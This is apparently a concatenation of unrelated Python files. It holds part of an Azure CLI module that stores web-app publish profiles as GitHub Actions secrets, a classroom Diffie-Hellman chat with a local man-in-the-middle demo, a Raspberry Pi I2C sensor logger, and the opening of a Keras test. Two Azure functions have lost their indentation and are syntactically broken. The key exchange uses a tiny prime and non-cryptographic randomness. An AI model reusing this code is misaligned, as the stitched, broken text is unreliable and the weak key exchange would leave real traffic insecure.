            error_msg += " Error: {}".format(e.data['message'])
        raise CLIError(error_msg)
    # Remove publish profile from GitHub
    if existing_publish_profile_name:
        logger.warning('Removing publish profile from GitHub')
        _remove_publish_profile_from_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo, token=token,
                                            github_actions_secret_name=existing_publish_profile_name, slot=slot)
    # Remove site source control properties
    delete_source_control(cmd=cmd,
                          resource_group_name=resource_group,
                          name=name,
                          slot=slot)
    return "Disconnected successfully."
def _get_publish_profile_from_workflow_file(workflow_file):
import re
publish_profile = None
regex = re.search(r'publish-profile: \$\{\{ secrets\..*?\}\}', workflow_file)
if regex:
publish_profile = regex.group()
publish_profile = publish_profile.replace('publish-profile: ${{ secrets.', '')
publish_profile = publish_profile[:-2]
if publish_profile:
return publish_profile.strip()
return None
def _update_site_source_control_properties_for_gh_action(cmd, resource_group, name, token, repo=None,
                                                         branch="master", slot=None):
    """Reset the site's source-control config to point at the given GitHub repo/branch.

    When *repo* is None, the currently configured repo URL is kept.  The old
    binding is deleted (if present) before the GitHub Actions binding is set.
    """
    repo_url = 'https://github.com/' + repo if repo else None
    existing = show_source_control(cmd=cmd,
                                   resource_group_name=resource_group,
                                   name=name,
                                   slot=slot)
    if existing:
        if not repo_url:
            repo_url = existing.repo_url
        delete_source_control(cmd=cmd,
                              resource_group_name=resource_group,
                              name=name,
                              slot=slot)
    config_source_control(cmd=cmd,
                          resource_group_name=resource_group,
                          name=name,
                          repo_url=repo_url,
                          repository_type='github',
                          github_action=True,
                          branch=branch,
                          git_token=token,
                          slot=slot)
def _get_workflow_template(github, runtime_string, is_linux):
    """Fetch the GitHub Actions workflow template for the runtime from Azure's template repo."""
    from github import GithubException
    from github.GithubException import BadCredentialsException
    template_file_path = _get_template_file_path(runtime_string=runtime_string, is_linux=is_linux)
    try:
        template_repo = github.get_repo('Azure/actions-workflow-templates')
        return template_repo.get_contents(template_file_path)
    except BadCredentialsException:
        raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
                       "the --token argument. Run 'az webapp deployment github-actions add --help' "
                       "for more information.")
    except GithubException as e:
        error_msg = "Encountered GitHub error when retrieving workflow template"
        if e.data and e.data['message']:
            error_msg += ": {}".format(e.data['message'])
        raise CLIError(error_msg)
def _fill_workflow_template(content, name, branch, slot, publish_profile, version):
if not slot:
slot = 'production'
content = content.replace('${web-app-name}', name)
content = content.replace('${branch}', branch)
content = content.replace('${slot-name}', slot)
content = content.replace('${azure-webapp-publish-profile-name}', publish_profile)
content = content.replace('${AZURE_WEBAPP_PUBLISH_PROFILE}', publish_profile)
content = content.replace('${dotnet-core-version}', version)
content = content.replace('${java-version}', version)
content = content.replace('${node-version}', version)
content = content.replace('${python-version}', version)
return content
def _get_template_file_path(runtime_string, is_linux):
    """Map a runtime string (e.g. 'java|1.8|tomcat|9.0') to a workflow template path.

    Raises CLIError when the runtime is empty or no template exists for it.
    """
    if not runtime_string:
        raise CLIError('Unable to retrieve workflow template')
    runtime_string = runtime_string.lower()
    runtime_stack = runtime_string.split('|')[0]
    template_file_path = None
    if is_linux:
        template_file_path = LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
    else:
        # Handle java naming: 'java|<version>|<container>|<container version>'.
        if runtime_stack == 'java':
            java_container_split = runtime_string.split('|')
            # BUG FIX: the original checked len(...) >= 2 but indexes [2] below,
            # which raised IndexError for a plain 'java|<version>' runtime.
            if len(java_container_split) >= 3:
                if java_container_split[2] == 'tomcat':
                    runtime_stack = 'tomcat'
                elif java_container_split[2] == 'java se':
                    runtime_stack = 'java'
        template_file_path = WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
    if not template_file_path:
        raise CLIError('Unable to retrieve workflow template.')
    return template_file_path
def _add_publish_profile_to_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
    """Store the app's publish profile (with secrets) as a GitHub Actions secret on *repo*.

    Raises CLIError when the profile cannot be fetched or the secret cannot be stored.
    """
    # Get publish profile with secrets
    import requests
    logger.warning("Fetching publish profile with secrets for the app '%s'", name)
    publish_profile_bytes = _generic_site_operation(
        cmd.cli_ctx, resource_group, name, 'list_publishing_profile_xml_with_secrets',
        slot, {"format": "WebDeploy"})
    # The operation yields byte chunks; only the first chunk is consumed.
    # NOTE(review): assumes the whole profile arrives in a single chunk — confirm.
    publish_profile = list(publish_profile_bytes)
    if publish_profile:
        publish_profile = publish_profile[0].decode('ascii')
    else:
        raise CLIError('Unable to retrieve publish profile.')
    # Add publish profile with secrets as a GitHub Actions Secret in the repo
    headers = {}
    headers['Authorization'] = 'Token {}'.format(token)
    headers['Content-Type'] = 'application/json;'
    headers['Accept'] = 'application/json;'
    # GitHub requires secrets to be sealed with the repo's public key before upload.
    public_key_url = "https://api.github.com/repos/{}/actions/secrets/public-key".format(repo)
    public_key = requests.get(public_key_url, headers=headers)
    if not public_key.ok:
        raise CLIError('Request to GitHub for public key failed.')
    public_key = public_key.json()
    encrypted_github_actions_secret = _encrypt_github_actions_secret(public_key=public_key['key'],
                                                                     secret_value=str(publish_profile))
    payload = {
        "encrypted_value": encrypted_github_actions_secret,
        "key_id": public_key['key_id']
    }
    store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
    stored_secret = requests.put(store_secret_url, data=json.dumps(payload), headers=headers)
    # Any 2xx status means the secret was stored successfully.
    if str(stored_secret.status_code)[0] != '2':
        raise CLIError('Unable to add publish profile to GitHub. Request status code: %s' % stored_secret.status_code)
def _remove_publish_profile_from_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
    """Delete the publish-profile secret from the GitHub repo (best effort; response ignored)."""
    import requests
    secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
    requests.delete(secret_url, headers={'Authorization': 'Token {}'.format(token)})
def _runtime_supports_github_actions(cmd, runtime_string, is_linux):
    """Return True when the resolved runtime stack declares GitHub Actions support."""
    helper = _StackRuntimeHelper(cmd, linux=(is_linux), windows=(not is_linux))
    matched = helper.resolve(runtime_string, is_linux)
    return bool(matched and matched.github_actions_properties)
def _get_app_runtime_info(cmd, resource_group, name, slot, is_linux):
    """Detect the app's runtime stack and version.

    Returns the dict produced by _get_app_runtime_info_helper
    ({'display_name', 'github_actions_version'}) or None when the runtime
    cannot be determined.
    """
    app_settings = None
    app_runtime = None
    if is_linux:
        app_metadata = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
        app_runtime = getattr(app_metadata, 'linux_fx_version', None)
        return _get_app_runtime_info_helper(cmd, app_runtime, "", is_linux)
    app_metadata = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'list_metadata', slot)
    app_metadata_properties = getattr(app_metadata, 'properties', {})
    if 'CURRENT_STACK' in app_metadata_properties:
        app_runtime = app_metadata_properties['CURRENT_STACK']
    # TODO try and get better API support for windows stacks
    if app_runtime and app_runtime.lower() == 'node':
        app_settings = get_app_settings(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
        for app_setting in app_settings:
            if 'name' in app_setting and app_setting['name'] == 'WEBSITE_NODE_DEFAULT_VERSION':
                app_runtime_version = app_setting['value'] if 'value' in app_setting else None
                if app_runtime_version:
                    return _get_app_runtime_info_helper(cmd, app_runtime, app_runtime_version, is_linux)
    elif app_runtime and app_runtime.lower() == 'python':
        app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
        app_runtime_version = getattr(app_settings, 'python_version', '')
        return _get_app_runtime_info_helper(cmd, app_runtime, app_runtime_version, is_linux)
    elif app_runtime and app_runtime.lower() == 'dotnetcore':
        # CLEANUP: the original assigned '3.1' and immediately overwrote it with
        # "" (dead store); keep the effective value — the empty string.
        app_runtime_version = ""
        return _get_app_runtime_info_helper(cmd, app_runtime, app_runtime_version, is_linux)
    elif app_runtime and app_runtime.lower() == 'java':
        app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
        app_runtime_version = "{java_version}, {java_container}, {java_container_version}".format(
            java_version=getattr(app_settings, 'java_version', '').lower(),
            java_container=getattr(app_settings, 'java_container', '').lower(),
            java_container_version=getattr(app_settings, 'java_container_version', '').lower()
        )
        return _get_app_runtime_info_helper(cmd, app_runtime, app_runtime_version, is_linux)
def _get_app_runtime_info_helper(cmd, app_runtime, app_runtime_version, is_linux):
    """Match a runtime/version pair against the stack catalog.

    Returns {'display_name', 'github_actions_version'} when the stack supports
    GitHub Actions deployments, otherwise None.
    """
    helper = _StackRuntimeHelper(cmd, linux=(is_linux), windows=(not is_linux))
    if not is_linux:
        matched_runtime = helper.resolve("{}|{}".format(app_runtime, app_runtime_version), is_linux)
    else:
        matched_runtime = helper.resolve(app_runtime, is_linux)
    gh_props = None if not matched_runtime else matched_runtime.github_actions_properties
    if gh_props:
        if gh_props.get("github_actions_version"):
            if is_linux:
                return {
                    "display_name": app_runtime,
                    "github_actions_version": gh_props["github_actions_version"]
                }
            # BUG FIX: the original called .lower() directly on gh_props.get(...)
            # and raised AttributeError when the catalog entry lacked the
            # "app_runtime_version" key; fall back to '' (no match) instead.
            if (gh_props.get("app_runtime_version") or "").lower() == app_runtime_version.lower():
                return {
                    "display_name": app_runtime,
                    "github_actions_version": gh_props["github_actions_version"]
                }
    return None
def _encrypt_github_actions_secret(public_key, secret_value):
    """Seal *secret_value* for the GitHub secrets API using the repo's base64 public key.

    NOTE(review): relies on `public` and `encoding` (PyNaCl modules) being
    imported elsewhere in this file — confirm the module-level imports.
    """
    # Encrypt a Unicode string using the public key
    from base64 import b64encode
    public_key = public.PublicKey(public_key.encode("utf-8"), encoding.Base64Encoder())
    sealed_box = public.SealedBox(public_key)
    encrypted = sealed_box.encrypt(secret_value.encode("utf-8"))
    # The GitHub API expects the sealed box as base64 text.
    return b64encode(encrypted).decode("utf-8")
|
diffie_hellman_key_exchange.py | import numpy as np
import hashlib as hl
import binascii
from Crypto.Cipher import AES
from base64 import b64encode
from base64 import b64decode
import json
import time
import threading
import os
prime_order_p = 16069  # public DH modulus p (tiny — fine for this exercise, not for real security)
generator_g = 21  # public generator g
lock = threading.Lock()  # guards the shared exchange files/globals across threads
# semaphore = threading.Semaphore()
# Given the generator g and prime order p, this function calculates the secret and
# the public key of the user.
# Namely, it randomly outputs a secret a, and calculates ga modulo p.
def generate_secret_and_g_a(g, p):
    """Pick a random secret exponent a in [10, 70) and return (g**a mod p, a)."""
    exponent = np.random.randint(10, 70)
    # Three-argument pow performs the exponentiation modulo p.
    public_value = pow(g, exponent, p)
    return public_value, exponent
# Given the secret and the public key of the second party, the first party calculates its private key.
# The following function for calculation is just like the one before,
# ya modulo p = gab mod p.
def calculate_private_key(y, secret, p):
    """Return the shared DH key y**secret mod p (= g**(ab) mod p).

    Uses three-argument pow for modular exponentiation — the original computed
    (y ** secret) % p, which builds a huge intermediate integer.  The lock is
    released in a finally block so an exception cannot leave it held.
    """
    lock.acquire()
    try:
        pk = pow(y, secret, p)
    finally:
        lock.release()
    return pk
def write_to_file(message: str, filename):
    """Append *message* (stringified) followed by a newline to *filename*."""
    with open(filename, "a") as handle:
        handle.write(str(message) + "\n")
def append_fifteen_zeros_the_string(message: str):
    """Pad *message* with fifteen trailing '0' characters (fixed-width record marker)."""
    return message + "0" * 15
# Given the key, message and the filename, this function encrypts the message
# using AES-128 CTR encryption, with a random nonce.
# Then the function from Crypto.Cipher library encrypts the message and returns a
# nonce and a ciphertext.
# I wrote these two values to the file with comma separation.
def encrypt(key, message: str, filename):
    """AES-CTR-encrypt *message* with *key* and append the record to *filename*.

    The record written is "<b64 nonce>,<b64 ciphertext + 15 zeros>"; the JSON
    payload {'nonce', 'ciphertext'} is returned to the caller.
    """
    data = bytes(message, encoding='utf-8')
    cipher = AES.new(key, AES.MODE_CTR)
    ct_bytes = cipher.encrypt(data)
    nonce = b64encode(cipher.nonce).decode('utf-8')
    ct = b64encode(ct_bytes).decode('utf-8')
    ct_end_str = append_fifteen_zeros_the_string(ct)
    result = json.dumps({'nonce': nonce, 'ciphertext': ct})
    # BUG FIX: the original bound this record to a local named `str`, shadowing
    # the builtin for the rest of the function.
    record = nonce + "," + ct_end_str
    write_to_file(record, filename)
    return result
# decrypt
# Takes the message written to the file and splits it into nonce and ciphertext.
# Next, it decrypts the message using these two parameters with AES-128 CTR mode.
# It then returns the plaintext.
def decrypt(username, message_input_from_file, key):
    """Decrypt one "<nonce>,<ciphertext + 15 zeros>" record written by encrypt().

    Prints and returns the plaintext; prints a notice and returns None when
    decoding fails.
    """
    try:
        # b64 = json.loads(json_input)
        # nonce = b64decode(b64['nonce'])
        # ct = b64decode(b64['ciphertext'])
        message_input_from_file = message_input_from_file.split(",")
        nonce = b64decode(message_input_from_file[0])
        # Strip the fixed 15-'0' padding appended by encrypt() before base64-decoding.
        ct = b64decode(message_input_from_file[1][:-15])
        cipher = AES.new(key, AES.MODE_CTR, nonce=nonce)
        pt = cipher.decrypt(ct)
        pt = bytes.decode(pt, encoding='utf-8')
        print(username + " received the ciphertext, the message was:", pt)
        return pt
    except (ValueError, KeyError):
        print("Incorrect decryption")
global K_ab_A  # no-op at module scope; documents the shared global set below
def get_user_input(file: str):
    """Thread target for party A: publish g^a, wait for B's value, derive K_ab_A.

    Appends A's public value to *file*, polls until a second value appears,
    then stores the shared key in the module-global K_ab_A.
    """
    y_A, secret_a = generate_secret_and_g_a(generator_g, prime_order_p)
    # Alice look if there is any. Else continue.
    f = open(file, "a")
    f.write(str(y_A) + "\n")
    f.close()
    # f = open(file, "r")
    f = np.genfromtxt(file)
    while f.size <= 1:
        f = np.genfromtxt(file)
        # TODO: Change to 10
        time.sleep(10)
    lock.acquire()
    f = open(file, "r")
    lines = f.readlines()
    # The second line in the file holds the peer's public value g^b.
    line = lines[1]
    y_B = int(line.strip())
    global K_ab_A
    K_ab_A = pow(y_B, secret_a, prime_order_p)
    # K_ab_A = calculate_private_key(y_B, secret_a, prime_order_p)
    lock.release()
global K_ab_B  # no-op at module scope; documents the shared global set below
def user2(file: str):
    """Thread target for party B: publish g^b, read A's public value, derive K_ab_B."""
    # semaphore.acquire()
    lock.acquire()
    global K_ab_B
    y_B, secret_b = generate_secret_and_g_a(generator_g, prime_order_p)
    f = open(file, "a")
    f.write(str(y_B) + "\n")
    f.close()
    # t1.join()
    f = open(file, "r")
    line = f.readline()
    f.close()
    # The first line in the file is A's public value g^a.
    y_A2 = int(line.strip())
    # y_A2 = f[0]
    K_ab_B = pow(y_A2, secret_b, prime_order_p)
    lock.release()
    # semaphore.release()
## Encrypted communication phase
# Unnecessary function.
def get_private_key(K_ab_A, K_ab_B):
    """Return SHA-256(key) as raw bytes when both parties derived the same key; None otherwise."""
    if K_ab_A != K_ab_B:
        return None
    digest_hex = hl.sha256(str(K_ab_A).encode('utf-8')).hexdigest()
    return binascii.unhexlify(digest_hex)
# K_ab_A is the calculated private key, namely the g^ab mod p.
# This function returns the H(gab mod p) in an ascii form.
def user1_key(K_ab_A):
    """Return the raw 32-byte SHA-256 digest of the shared DH value (used as the AES key)."""
    return binascii.unhexlify(hl.sha256(str(K_ab_A).encode('utf-8')).hexdigest())
# K_ab_B is the calculated private key, namely the g^ab mod p.
# This function returns the H(gab mod p) in an ascii form.
def user2_key(K_ab_B):
    """Return the raw 32-byte SHA-256 digest of the shared DH value (used as the AES key)."""
    return binascii.unhexlify(hl.sha256(str(K_ab_B).encode('utf-8')).hexdigest())
def user_send_message(message: str, key, filename):
    """Encrypt *message* with *key* and append it to *filename*; returns the JSON payload."""
    return encrypt(key, message, filename)
# key = get_private_key(K_ab_A, K_ab_B)
def communication_phase(username1, username2, K_ab_A, K_ab_B, filename):
    """Interactive chat loop: both parties encrypt into *filename* and decrypt from it.

    Alternates prompting username1 and username2; the loop ends when username1
    enters "-1" (or the while condition sees "-1" from either prompt).
    """
    input_from_user = " "
    user1Key = user1_key(K_ab_A)
    print(username1 + "'s key", user1Key)
    user2Key = user2_key(K_ab_B)
    print(username2 + "'s key", user2Key)
    # Index of the next message line in the shared file (the first lines hold
    # the public DH values written during the key exchange).
    message_counter = 1
    print("This conversation will go on until one of the parties input -1.")
    while input_from_user != "-1":
        input_from_user = input(username1 + "'s message:")
        if input_from_user == "-1":
            break
        message_counter += 1
        dummy = user_send_message(input_from_user, user1Key, filename)
        encrypted_message = np.genfromtxt(filename, dtype="U")[message_counter]
        if not encrypted_message:
            time.sleep(10)
        else:
            # print("current_message", encrypted_message)
            decrypt(username2, encrypted_message, user2Key)
        input_from_user = input(username2 + "'s message:")
        message_counter += 1
        dummy = user_send_message(input_from_user, user2Key, filename)
        encrypted_message = np.genfromtxt(filename, dtype="U")[message_counter]
        if not encrypted_message:
            time.sleep(10)
        else:
            decrypt(username1, encrypted_message, user1Key)
def attacker_communication_phase(username1, username2, K_ab_A1, K_ab_B1, K_ab_A2, K_ab_B2, file1, file2):
    """Relay the chat through the attacker (man-in-the-middle demo).

    K_ab_A1/K_ab_B1 are the attacker's and first party's shared keys for
    *file1*; K_ab_A2/K_ab_B2 are the attacker's and second party's shared keys
    for *file2*.

    BUG FIX: the original derived every key from the module globals K_ab_A and
    K_ab_B (which hold the values of the *last* exchange) and ignored these
    parameters, so the first party's traffic used the wrong keys.  The keys are
    now derived from the parameters the caller snapshots per exchange.
    """
    input_from_user = " "
    attackerKey_first_party = user1_key(K_ab_A1)
    print("Attacker1's key with " + username1, attackerKey_first_party)
    userKey_first_party = user2_key(K_ab_B1)
    print(username1 + "'s key", userKey_first_party)
    attackerKey_second_party = user1_key(K_ab_A2)
    print("Attacker2's key with " + username2, attackerKey_second_party)
    userKey_second_party = user2_key(K_ab_B2)
    print(username2 + "'s key", userKey_second_party)
    message_counter_1 = 1
    while input_from_user != "-1":
        input_from_user = input(username1 + "'s message:")
        if input_from_user == "-1":
            break
        message_counter_1 += 1
        dummy = user_send_message(input_from_user, userKey_first_party, file1)
        encrypted_message = np.genfromtxt(file1, dtype="U")[message_counter_1]
        if not encrypted_message:
            time.sleep(10)
        else:
            # The attacker decrypts the first party's message with their shared key.
            decrypt("Attacker", encrypted_message, attackerKey_first_party)
        # The attacker decides what to forward to the second party.
        input_from_user = input("The message that will be sent to other party:")
        if input_from_user == "-1":
            break
        # Attacker encrypts his message with his own key for the second channel.
        dummy = user_send_message(input_from_user, attackerKey_second_party, file2)
        encrypted_message = np.genfromtxt(file2, dtype="U")[message_counter_1]
        if not encrypted_message:
            time.sleep(10)
        else:
            # The second party decrypts the message with their own key.
            decrypt(username2, encrypted_message, userKey_second_party)
        # Same steps in the opposite direction: second party -> attacker -> first party.
        input_from_user = input(username2 + "'s message:")
        if input_from_user == "-1":
            break
        message_counter_1 += 1
        dummy = user_send_message(input_from_user, userKey_second_party, file2)
        encrypted_message = np.genfromtxt(file2, dtype="U")[message_counter_1]
        if not encrypted_message:
            time.sleep(10)
        else:
            decrypt("Attacker", encrypted_message, attackerKey_second_party)
        input_from_user = input("The message that will be sent to other party:")
        dummy = user_send_message(input_from_user, attackerKey_first_party, file1)
        encrypted_message = np.genfromtxt(file1, dtype="U")[message_counter_1]
        if not encrypted_message:
            time.sleep(10)
        else:
            # The first party decrypts the forwarded message with their own key.
            decrypt(username1, encrypted_message, userKey_first_party)
# Cleaning the files before restart.
# f = open("Communication.txt", "w")
# f.close()
#
# username1 = input("Please enter username for user 1" + "\n")
# t1 = threading.Thread(target=get_user_input, args=("Communication.txt",))
# t1.start()
# t2 = threading.Thread(target=user2, args=("Communication.txt",))
# username2 = input("Please enter username for user 2" + "\n")
# t2.start()
# t2.join()
# t1.join()
# print("First Part Communication Phase")
# communication_phase(username1, username2, K_ab_A, K_ab_B, "Communication.txt")
# Unnecessary function
# def copy_files_into_A_and_B(file1, file2):
# with open("Communication.txt") as f:
# with open(file1, "w") as f1:
# for line in f:
# f1.write(line)
# with open("Communication.txt") as f:
# with open(file2, "w") as f2:
# for line in f:
# f2.write(line)
# Man in the middle
def man_in_the_middle(file1, file2):
    """Run two DH exchanges (attacker<->user1 via file1, attacker<->user2 via file2), then relay chat."""
    # copy_files_into_A_and_B(file1, file2)
    print("########################")
    print("Man in the middle")
    # For Alice.
    attacker_username1 = input("Please enter username for Attacker for user 1" + "\n")
    t1 = threading.Thread(target=get_user_input, args=(file1,))
    t1.start()
    t2 = threading.Thread(target=user2, args=(file1,))
    username1 = input("Please enter username for user 1" + "\n")
    t2.start()
    t2.join()
    t1.join()
    global K_ab_A, K_ab_B
    # Snapshot the globals before the second exchange overwrites them.
    attacker_K_with_first_party = np.copy(K_ab_A)
    first_party_K = np.copy(K_ab_B)
    # First Alice got her keys with Attacker
    # Now, Bob will get his keys with the Attacker.
    attacker_username2 = input("Please enter username for Attacker for user 2" + "\n")
    t1 = threading.Thread(target=get_user_input, args=(file2,))
    t1.start()
    t2 = threading.Thread(target=user2, args=(file2,))
    username2 = input("Please enter username for user 2" + "\n")
    t2.start()
    t2.join()
    t1.join()
    attacker_K_with_second_party = np.copy(K_ab_A)
    second_party_K = np.copy(K_ab_B)
    # First with alice
    print("Man in the Middle Communication Phase")
    attacker_communication_phase(username1, username2, attacker_K_with_first_party, first_party_K,
                                 attacker_K_with_second_party, second_party_K, file1, file2)
# file1 = "Communication_A.txt"
# file2 = "Communication_B.txt"
# # Cleaning the files before restart.
# f = open(file1, "w")
# f.close()
# f = open(file2, "w")
# f.close()
# man_in_the_middle(file1, file2)
# The above part was single-file implementation.
# Two separate file implementation:
def get_user_input2(file: str, y_A, secret_a, sleep_time):
    """Wait for the peer's public value in *file* and derive the shared key.

    Returns (private_key, is_first_user) where is_first_user tells whether
    this party's value y_A was written first (index 0) in the file.
    """
    f = np.genfromtxt(file)
    while f.size <= 1:
        f = np.genfromtxt(file)
        print("Waiting for the second party to enter!")
        time.sleep(sleep_time)
    lock.acquire()
    f = np.genfromtxt(file)
    index = np.where(f == y_A)[0][0]
    is_first_user = index == 0
    index = 0
    # Pick the first value that is not our own as the peer's public value.
    # NOTE(review): if both parties draw an identical y, y_B stays unbound and
    # pow() below raises NameError — confirm acceptable for the demo.
    for i in f:
        if i != y_A:
            y_B = int(i)
            break
    # f = open(file, "r")
    # lines = f.readlines()
    # line = lines[1]
    # y_B = int(line.strip())
    private_key = pow(y_B, secret_a, prime_order_p)
    # K_ab_A = calculate_private_key(y_B, secret_a, prime_order_p)
    lock.release()
    return private_key, is_first_user
def communication_phase_multiple_files(username, hashed_private_key, is_first_user, file, sleep_time):
    """Chat loop for the two-terminal variant: each party runs this against the same file.

    The first user writes, then polls for the reply; the second user polls
    first, then writes.  A message of "-1" from either side ends the loop.
    *size* tracks the index of the next expected line in the shared file
    (the first two lines hold the public DH values).
    """
    input_from_user = ""
    pt = ""
    size = 2
    while input_from_user != "-1" or pt != "-1":
        if is_first_user:
            input_from_user = input(username + "'s message:")
            # Write message to the file.
            dummy = user_send_message(input_from_user, hashed_private_key, file)
            if input_from_user == "-1":
                break
            # Get the next message from second party.
            f = np.genfromtxt(file, dtype="U")
            size += 1
            while f.size <= size:
                f = np.genfromtxt(file)
                time.sleep(sleep_time)
                print("Waiting for the other party to send a message!")
            encrypted_message = np.genfromtxt(file, dtype="U")[size]
            if not encrypted_message:
                time.sleep(sleep_time)
            else:
                pt = decrypt(username, encrypted_message, hashed_private_key)
            size += 1
        else:
            f = np.genfromtxt(file, dtype="U")
            while f.size == size:
                f = np.genfromtxt(file)
                print("Waiting for other party")
                time.sleep(sleep_time)
            encrypted_message = np.genfromtxt(file, dtype="U")[size]
            if not encrypted_message:
                time.sleep(sleep_time)
            else:
                # print("current_message", encrypted_message)
                pt = decrypt(username, encrypted_message, hashed_private_key)
            if pt == "-1":
                break
            size += 1
            input_from_user = input(username + "'s message:")
            dummy = user_send_message(input_from_user, hashed_private_key, file)
            size += 1
sleep_time = 10  # seconds between file polls while waiting for the peer
def part1():
    """Part 1 entry point: two-terminal DH exchange and chat over a single shared file."""
    filename = "Communication.txt"
    if not os.path.isfile(filename):
        f = open(filename, "w")
        f.close()
    # Cleaning the files before restart.
    # f = open(filename, "w")
    # f.close()
    username = input("Please enter username" + "\n")
    # username = "A"
    y, secret = generate_secret_and_g_a(generator_g, prime_order_p)
    command = ""
    while command != "init":
        command = input("Please enter init to start." + "\n")
        if command == "init":
            break
    write_to_file(str(y), filename)
    private_key, is_first_user = get_user_input2(filename, y, secret, sleep_time)
    # print("is_first?", is_first_user)
    userKey = user1_key(private_key)
    print(username + "'s hashed key:", userKey)
    communication_phase_multiple_files(username, userKey, is_first_user, filename, sleep_time)
# part1()
# Man in the middle part - Multiple Files
file1 = "Communication_A.txt"
file2 = "Communication_B.txt"
# Cleaning the files before restart.
# f = open(file1, "w")
# f.close()
# f = open(file2, "w")
# f.close()
def part2():
    """Run the handshake and chat session in the two-file (MITM) scenario.

    The first party to arrive claims `file1`; a later arrival (whose `file1`
    is already non-empty) uses `file2` instead.
    """
    print("################################")
    print("Man in the middle part")
    username = input("Please enter username\n")
    # username = "A"
    # This party's DH secret exponent and public value g^a mod p.
    public_value, secret = generate_secret_and_g_a(generator_g, prime_order_p)
    # Block until the user explicitly types "init".
    while input("Please enter init to start.\n") != "init":
        pass
    # Pick the channel: file1 if it is still empty, otherwise file2.
    channel = file1 if np.genfromtxt(file1).size == 0 else file2
    write_to_file(str(public_value), channel)
    private_key, is_first_user = get_user_input2(channel, public_value, secret, sleep_time)
    hashed_key = user1_key(private_key)
    print(username + "'s hashed key:", hashed_key)
    communication_phase_multiple_files(username, hashed_key, is_first_user, channel, sleep_time)
# part2()
|
dataHistory.py | import json
from datetime import datetime
import time
import threading
from os.path import exists
from smbus import SMBus
import struct
# I2C slave address of Arduino 1, which supplies humidity/temperature data.
ARDUINO1_I2C_ADDRESS = 18
class BackgroundHistory(object):
    """Samples humidity/temperature from the Arduino over I2C in a daemon
    thread, appends each reading to ``dataHistory.json`` (one JSON object per
    line), and keeps the most recent readings cached in memory.
    """

    def __init__(self, interval=10, number_elements=10):
        """Load persisted history and start the background sampling thread.

        Args:
            interval: seconds to sleep between I2C reads.
            number_elements: maximum number of readings kept in memory.
        """
        self.interval = interval
        self.number_elements = number_elements
        self.elements = []
        self.read()
        thread = threading.Thread(target=self.run)
        thread.daemon = True  # do not keep the process alive on shutdown
        thread.start()

    def run(self):
        """Poll the Arduino forever, persisting and caching each reading."""
        while True:
            bus = SMBus(1)
            try:
                i2c_data1 = bus.read_i2c_block_data(ARDUINO1_I2C_ADDRESS, 0)
            finally:
                # Release the bus even if the read raises (original leaked it
                # on failure).
                bus.close()
            # The first 8 bytes carry two packed C floats: humidity then
            # temperature.
            humidity, temperature = struct.unpack(
                "ff", struct.pack("B" * 8, *i2c_data1[0:8]))
            data = {"timestamp": str(datetime.now()),
                    "humidity": humidity,
                    "temperature": temperature}
            with open("dataHistory.json", "a+") as f:
                f.write(json.dumps(data) + "\n")
            self.elements.append(data)
            if len(self.elements) > self.number_elements:
                self.elements.pop(0)
            time.sleep(self.interval)

    def read(self):
        """Reload the cache from ``dataHistory.json``, keeping only the most
        recent ``number_elements`` readings.
        """
        if exists("dataHistory.json"):
            # Context manager closes the file (original left the handle open).
            with open("dataHistory.json", "r") as f:
                for line in f:
                    try:
                        self.elements.append(json.loads(line.strip()))
                    except ValueError:
                        # Skip corrupt/partial lines only; JSONDecodeError is a
                        # subclass of ValueError (original bare `except` hid
                        # every error, including KeyboardInterrupt).
                        pass
            # Trim in a loop: the original popped at most one element, so the
            # cache could exceed number_elements after loading a long file.
            while len(self.elements) > self.number_elements:
                self.elements.pop(0)

    def get_elements(self):
        """Return the cached list of recent readings (oldest first)."""
        return self.elements
variable_scope_shim_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for variable store."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gc
import threading
from absl.testing import parameterized
from keras import combinations
from keras import regularizers
from keras.engine import input_layer as input_layer_module
from keras.engine import training as training_module
from keras.layers import core
from keras.legacy_tf_layers import core as core_layers
from keras.legacy_tf_layers import variable_scope_shim
import numpy
import tensorflow.compat.v2 as tf
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import
from tensorflow.python.ops import variable_scope # pylint: disable=g-direct-tensorflow-import
def run_inside_wrap_function_in_eager_mode(graph_function):
  """Decorator to execute the same graph code in eager and graph modes.

  In graph mode the wrapped test body runs unchanged. In eager mode it runs
  with a fresh eager variable store installed, so `get_variable` calls are
  resolved through the shim's store.

  Args:
    graph_function: python function containing graph code to be wrapped

  Returns:
    decorated function
  """

  def _execute_with_store(self):
    # Install a dedicated eager variable store for the duration of the call,
    # then invoke the original test body under it.
    eager_store = variable_scope_shim._EagerVariableStore()
    with variable_scope.with_variable_store(eager_store):
      graph_function(self)

  return _execute_with_store
class VariableScopeTest(tf.test.TestCase):
  """Behavioral tests for `tf.compat.v1.variable_scope`/`get_variable` run
  through the eager variable-store shim (see the decorator above).

  Most tests assert the exact `<scope>/<name>:0` names produced by scope
  nesting, reuse, default-name uniquification, and `auxiliary_name_scope`.
  """

  def tearDown(self):
    gc.collect()
    # This will only contain uncollectable garbage, i.e. reference cycles
    # involving objects with __del__ defined.
    self.assertEqual(0, len(gc.garbage))

  @test_util.run_in_graph_and_eager_modes
